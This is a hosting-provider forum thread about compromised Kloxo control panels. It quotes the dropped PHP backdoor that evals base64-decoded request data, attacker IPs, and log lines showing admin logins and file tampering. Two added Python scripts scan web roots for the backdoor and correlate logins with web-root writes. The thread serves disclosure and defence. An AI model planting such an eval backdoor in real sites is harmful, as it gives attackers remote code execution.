amuck-landowner

Kloxo installations compromised

Damian

New Member
Verified Provider
We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into /home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):


<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>

 

where the $_REQUEST variable name is a random value. The basic premise of the script is: if that specific $_REQUEST variable is set, then decode and run all of the code passed via the variable. This is obviously bad.

 

All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

 

Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDoS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's affected Ramnode, if not others. Beware!
 
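A scanner for the dropped file, as an added example that is not part of the original post or of Kloxo: it walks the web roots named in the thread, flags any PHP file matching the eval(base64_decode($_REQUEST[...])) shape (plus a few common variants of it), and notes random-looking filenames. The root directories, the regexes and the constructed sample files are my assumptions; run with no arguments on a host without those directories it scans the samples instead.

```python
#!/usr/bin/env python3
"""Scan Kloxo web roots for the eval(base64_decode($_REQUEST[...])) backdoor.

Added example written for this thread, not code from the original post or
from Kloxo; the paths, signature regexes and sample files are assumptions."""
import os
import re
import sys
import tempfile

# Web roots the thread names as infected (assumption: stock Kloxo layout).
DEFAULT_ROOTS = ["/home/kloxo/httpd/default", "/home/httpd"]

# Content signatures, checked in order. The first is the exact shape of the
# dropped file; the rest catch the usual variations of the same idea.
SIGNATURES = [
    ("eval_b64_request", re.compile(
        r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I)),
    ("eval_request", re.compile(
        r"eval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I)),
    ("eval_b64_blob", re.compile(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}", re.I)),
    ("random_hex_key", re.compile(
        r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[\s*['\"][0-9a-f]{16,}['\"]\s*\]", re.I)),
]

# The dropped files were randomly named, but default.php is overwritten too,
# so the name is only a hint; content decides.
RANDOM_NAME = re.compile(r"[0-9a-f]{8,}\.php\d?$", re.I)
PHP_EXT = (".php", ".php5", ".phtml")


def match_signatures(source: str) -> list:
    """Return the names of every signature that fires on PHP source text."""
    return [name for name, rx in SIGNATURES if rx.search(source)]


def looks_random_name(filename: str) -> bool:
    return RANDOM_NAME.fullmatch(filename) is not None


def scan_tree(root: str, max_bytes: int = 2_000_000) -> list:
    """Walk a web root and return [(path, [hits...])] for each PHP file that
    trips a content signature or has a random-looking name."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue
            hits = match_signatures(data.decode("latin-1"))
            if looks_random_name(fn):
                hits.append("random_name")
            if hits:
                findings.append((path, hits))
    return findings


# Constructed sample: the dropped file as quoted in the thread, minus the
# decoy HTML, which plays no part in detection.
SAMPLE_BACKDOOR = (
    "<?php\nset_time_limit(0);error_reporting(NULL);\n"
    "if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL)"
    "{eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}\n"
    "else{echo 'Access denied.';}\n?>\n"
)
# Constructed benign file: base64_decode on its own must not be a hit.
SAMPLE_BENIGN = (
    "<?php\n$img = base64_decode($_POST['avatar']);\n"
    "file_put_contents('/tmp/avatar.png', $img);\n?>\n"
)


def demo_scan() -> dict:
    """Write the samples into a temp tree laid out like a Kloxo default site,
    scan it, and return {filename: hits}."""
    with tempfile.TemporaryDirectory() as tmp:
        site = os.path.join(tmp, "home", "kloxo", "httpd", "default")
        os.makedirs(site)
        for name, body in (("8ba7afbaaddc67de.php", SAMPLE_BACKDOOR),
                           ("default.php", SAMPLE_BACKDOOR),
                           ("index.php", SAMPLE_BENIGN)):
            with open(os.path.join(site, name), "w") as fh:
                fh.write(body)
        return {os.path.basename(p): hits for p, hits in scan_tree(tmp)}


if __name__ == "__main__":
    roots = sys.argv[1:] or [r for r in DEFAULT_ROOTS if os.path.isdir(r)]
    if not roots:
        print("no Kloxo web roots here; scanning constructed samples instead")
        for name, hits in demo_scan().items():
            print(f"{name}: {', '.join(hits)}")
    else:
        found = [(p, h) for r in roots for p, h in scan_tree(r)]
        for path, hits in found:
            print(f"{path}: {', '.join(hits)}")
        sys.exit(1 if found else 0)
```

Treat a content hit as the decision and the random-name hint as supporting evidence only; the overwritten default.php is caught by content alone. Because the dropper leaves the files owned by root:root (see the filesys log line later in the thread), `find /home/kloxo/httpd /home/httpd -user root -name '*.php'` is a cheap complementary check that needs no signatures at all.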

vRozenSch00n

Active Member
Kloxo "Host In A Box" template is a disaster as it has never been upgraded for years. Moreover, regular users never upgrade a new installation to the latest version (6.1.12), and they don't use any firewall.

Even the latest version has many vulnerabilities, e.g. recursive bind, an Apache exploit through lxphp, brute force against the admin login, and several other minor issues such as the master/slave config that will break the Apache vhost configuration.

AFAIK there was a disagreement among the developers, which led to the Kloxo-MR fork.
 

SkylarM

Well-Known Member
Verified Provider
We don't provide that template, but just suspended like 15-20 containers for this. Killed CPU on nodes long before any massive network issues, but the amount of them caused a few fun times :p
 

vRozenSch00n

Active Member
My test VPS was also compromised with the same issue, and I found out from the log that they brute-forced the control panel login. The log shows that it comes from IP 178.248.23.39
 

Steven

New Member
It appears to be an SQL injection:
 

access_log:178.248.23.58 - [26/Jan/2014:18:11:58 +0300] "<snipped the inject> HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0"

They are getting access to the admin user:
 

login_success:12:27 Jan/27/2014: Successful Login to admin from 178.248.23.29

They are injecting files using display.php:
 

shell_exec:12:27 Jan/27/2014: 0: [(__system__:/usr/local/lxlabs/kloxo/httpdocs) 'chmod' '0644' '/home/kloxo/httpd/default/default.php']
filesys:12:27 Jan/27/2014: Chown /home/kloxo/httpd/default/default.php to root:root

NOTE: default.php is being injected into 'every' account.
 
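A triage script for the sequence Steven's logs show (an admin login from an unexpected address, followed within minutes by chmod/chown of files inside a web root), as an added example that is not from the thread or from Kloxo. It reads the grep-style "logfile:line" output quoted above. The allowlist CIDR, the 30-minute window, the web-root prefixes and the sample lines (modeled on the thread's, with an invented earlier login and an extra account path) are my assumptions.

```python
#!/usr/bin/env python3
"""Correlate Kloxo admin logins with writes into web roots.

Added example, not code from the thread or from Kloxo. Input is the
grep-style "logfile:line" output quoted in the thread; the allowlist,
time window, web-root prefixes and sample lines are assumptions."""
import ipaddress
import re
from datetime import datetime, timedelta

# Line shapes copied from the thread's grep output.
LOGIN_RX = re.compile(
    r"^login_success:(\d\d:\d\d) (\w{3}/\d\d/\d{4}): Successful Login to (\S+) from (\S+)$")
SHELL_RX = re.compile(
    r"^shell_exec:(\d\d:\d\d) (\w{3}/\d\d/\d{4}): .*'(/home/[^']+)'\]$")
FILESYS_RX = re.compile(
    r"^filesys:(\d\d:\d\d) (\w{3}/\d\d/\d{4}): Chown (\S+) to (\S+)$")

# Assumption: stock Kloxo layout; anything written under these is a site file.
WEBROOTS = ("/home/kloxo/httpd/", "/home/httpd/")


def _ts(time_s, date_s):
    return datetime.strptime(f"{date_s} {time_s}", "%b/%d/%Y %H:%M")


def parse(lines):
    """Turn log lines into (timestamp, kind, details) tuples sorted by time;
    lines that match none of the three shapes are ignored."""
    events = []
    for line in lines:
        m = LOGIN_RX.match(line)
        if m:
            events.append((_ts(m[1], m[2]), "login", {"user": m[3], "ip": m[4]}))
            continue
        m = SHELL_RX.match(line)
        if m:
            events.append((_ts(m[1], m[2]), "write", {"path": m[3]}))
            continue
        m = FILESYS_RX.match(line)
        if m:
            events.append((_ts(m[1], m[2]), "chown", {"path": m[3], "owner": m[4]}))
    events.sort(key=lambda e: e[0])  # stable, so input order survives equal times
    return events


def triage(lines, allowed_cidrs, window_minutes=30):
    """Return alert tuples. A login from outside the allowlist is flagged, and
    every web-root write or chown within window_minutes after it is tied to
    that login; a root:root chown inside a web root is flagged on its own."""
    allowed = [ipaddress.ip_network(c) for c in allowed_cidrs]
    window = timedelta(minutes=window_minutes)
    alerts, bad_logins = [], []
    for ts, kind, d in parse(lines):
        if kind == "login":
            ip = ipaddress.ip_address(d["ip"])
            if not any(ip in net for net in allowed):
                bad_logins.append((ts, d["ip"]))
                alerts.append(("unlisted_login", ts, d["user"], d["ip"]))
        elif d["path"].startswith(WEBROOTS):
            recent = [ip for t, ip in bad_logins if timedelta(0) <= ts - t <= window]
            if recent:
                alerts.append(("webroot_write_after_login", ts, d["path"], recent[-1]))
            if kind == "chown" and d["owner"] == "root:root":
                alerts.append(("root_owned_webroot_file", ts, d["path"]))
    return alerts


# Constructed sample, modeled on the lines quoted in the thread; the first
# login and the second account path are invented for illustration.
SAMPLE_LOG = """\
login_success:09:02 Jan/27/2014: Successful Login to admin from 203.0.113.10
login_success:12:27 Jan/27/2014: Successful Login to admin from 178.248.23.29
shell_exec:12:27 Jan/27/2014: 0: [(__system__:/usr/local/lxlabs/kloxo/httpdocs) 'chmod' '0644' '/home/kloxo/httpd/default/default.php']
filesys:12:27 Jan/27/2014: Chown /home/kloxo/httpd/default/default.php to root:root
shell_exec:12:29 Jan/27/2014: 0: [(__system__:/usr/local/lxlabs/kloxo/httpdocs) 'chmod' '0644' '/home/httpd/example.com/httpdocs/default.php']
""".splitlines()

# Assumption: 203.0.113.0/24 is where the host's own staff log in from.
ALLOWED = ["203.0.113.0/24"]

if __name__ == "__main__":
    import sys
    lines = [l.rstrip("\n") for l in sys.stdin] if not sys.stdin.isatty() else SAMPLE_LOG
    for alert in triage(lines, ALLOWED):
        print(*alert)
```

Feed it with something like `grep -H . /var/log/kloxo/login_success /var/log/kloxo/shell_exec /var/log/kloxo/filesys | python3 triage.py` (the log locations are an assumption; use wherever your Kloxo writes them). The root:root check is independent of the login correlation because, as the filesys line above shows, site files in a web root should never end up owned by root regardless of who logged in.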

DaringHost

New Member
Also just suspended a decent number of VPSs who were affected by this. I checked the admin access logs for one client and see that the admin account was accessed by these two IP addresses: 178.248.23.122 and 178.248.23.174

Nulled 178.248.23.0/24 across all servers.
 

vRozenSch00n

Active Member
As I stated before, after the disagreement (which makes me sad :( ), Kloxo development slowed down and Kloxo-MR managed to fork its way to a more secure and stable control panel, with the ability to change the PHP version on the fly and to use nginx or varnish as a reverse proxy.
 

DomainBop

Dormant VPSB Pathogen
Iniz sent out emails today requiring clients to remove Kloxo immediately. Hopefully other hosts will also ban the use of Kloxo (and ZPanel) and remove them from their templates.
 

DomainBop

Dormant VPSB Pathogen
Moreover, regular user never upgrade new installation to the latest version (6.1.12) and they don't use any firewall.
A very large percentage of web sites are running outdated scripts that contain vulnerabilities, including many corporate websites (example: WordPress 3.4.2, http://mybuys.com/readme.html). It's not surprising that people/companies don't take the security of their websites seriously, since many companies and government agencies allow their employees to surf the Internet from their desks using outdated browsers that are full of vulnerabilities (I'm looking at a Piwik report for one of my sites and I see a visitor from the US Postal Service who is using Internet Explorer 7).
 

MartinD

Retired Staff
Verified Provider
This is wreaking havoc - totally come out of nowhere and gone nuts!
 

wlanboy

Content Contributer
Iniz sent out emails today requiring clients to remove Kloxo immediately. Hopefully other hosts will also ban the use of Kloxo (and ZPanel) and remove them from their templates.
Tactical VPS did that too.

Templates are bad because they suggest (in the eyes of the customer) that they are safe by default because the hoster is offering them.
 

vRozenSch00n

Active Member
Second that - both are beyond any repair.
I don't know much about ZPanel, but in Kloxo's case there are a lot of rubbish files and rubbish functions left over. This is because the late Ligesh wanted to integrate Windows and Debian functionality (you should have seen the source code prior to version 6.1.6). It also seems that the way he coded was based on in-time patches.

Yes, it needs a whole lot of cleaning up or simply rewrite from scratch. 
 